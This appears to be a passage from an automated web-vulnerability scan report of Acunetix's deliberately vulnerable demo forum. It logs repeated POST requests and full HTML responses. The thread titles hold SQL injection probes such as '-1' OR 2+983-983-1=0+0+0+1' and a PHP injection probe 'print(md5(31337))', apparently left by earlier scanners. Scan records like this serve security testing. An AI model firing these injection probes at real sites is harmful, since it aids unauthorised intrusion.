bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3178 |
Response Body - size: 3,178 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3113 |
Response Body - size: 3,113 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum '.print(md5(31337)).' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/'.print(md5(31337)).' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>'.print(md5(31337)).' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3178 |
Response Body - size: 3,178 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=41 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3172 |
Response Body - size: 3,172 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=42 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3172 |
Response Body - size: 3,172 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=43 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 2+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 2+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 2+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=44 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=45 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2<(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2<(0+5+781-781) -- 